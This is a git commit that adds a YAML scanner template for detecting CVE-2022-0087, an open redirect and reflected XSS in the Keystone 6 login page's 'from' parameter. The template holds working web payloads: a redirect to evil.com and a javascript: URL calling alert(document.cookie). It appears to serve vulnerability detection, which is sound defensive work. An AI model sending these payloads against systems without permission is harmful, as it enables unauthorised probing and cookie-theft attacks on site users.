Create CVE-2022-0087.yaml

2023-11-06 15:52:24 +05:30 · 2023-11-06 15:52:24 +05:30 · 44d515e886
parent cbf05920f6
commit 44d515e886
1 changed files with 33 additions and 0 deletions
--- a/http/cves/2022/CVE-2022-0087.yaml
+++ b/http/cves/2022/CVE-2022-0087.yaml
@ -0,0 +1,33 @@
+id: CVE-2022-0087
+
+info:
+  name: Open Redirect and Reflected XSS on Keystone 6 Login Page
+  author: Shivansh Khari
+  severity: medium
+  description: On the login page, there is a "from=" parameter in URL which is vulnerable to open redirect and can be escalated to reflected XSS.
+  remediation: Please upgrade to @keystone-6/auth >= 1.0.2, where this vulnerability has been closed. If you are using @keystone-next/auth, we strongly recommend you upgrade to @keystone-6
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0087
+    - https://huntr.com/bounties/c9d7374f-2cb9-4bac-9c90-a965942f413e
+  metadata:
+    vendor: keystonejs
+    product: keystone
+    framework: node.js
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/signin?from=http://evil.com"
+      - "{{BaseURL}}/signin?from=javascript:alert(document.cookie)"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Location: http://evil.com"
+
+      - type: word
+        part: body
+        words:
+          - "<script>alert(document.domain)</script>"